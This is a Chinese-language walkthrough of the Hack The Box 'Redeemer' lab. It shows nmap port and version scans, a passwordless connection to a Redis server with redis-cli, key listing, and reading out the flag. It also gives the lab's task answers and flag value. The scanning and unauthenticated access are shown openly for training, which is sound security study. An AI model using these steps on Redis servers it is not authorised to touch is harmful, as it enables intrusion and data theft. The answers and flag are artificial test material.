Hack The Box(黑客盒子)Redeemer篇
题目
情报
题目已披露的靶机缺陷:Redis数据库可能存在缺陷,可能存在匿名访问缺陷。
实战答题
任务一
使用nmap扫描靶机端口
nmap -sS -T4 -Pn -p0-65535 10.129.172.105
发现端口6379开放,协议是TCP。
6379
任务二
redis
任务三
redis是内存型数据库
In-memory Database
任务四
在linux中使用redis-cli命令行工具,来实现与Redis服务器的交互。
redis-cli
任务五
输入redis-cli --help查看该工具的参数。发现指定主机名的参数。
redis-cli --help
-h
任务六
先连接主机,获取Redis服务器的信息和统计信息。
redis-cli -h 10.129.172.105
直接连上了,没有密码。
获取Redis服务器的信息和统计信息。
info
任务七
使用nmap针对6379端口扫描,识别redis服务的版本。
nmap -sV -p6379 -v 10.129.172.105
5.0.7
任务八
在成功连接redis数据库并通过info命令获取数据库信息后,通过查看Keyspace信息模块,可以得知该数据库中有一个数据库名为db0,keys=4,数据库索引为0。使用命令
select 0 #select+index(索引号,此处选择0号索引)表示选择索引为0的数据库
任务九
翻译问题,键=keys
4
任务十
使用select命令选择数据库后,执行keys *
select 0 #选择数据库
keys * #获取数据库中的所有密钥?
任务十一
发现有一个键为flag,使用get命令 可查看flag值(tips-使用命令exit退出redis服务器连接):
get flag
03e1d2b376c37ab3f5319922053953eb
通关。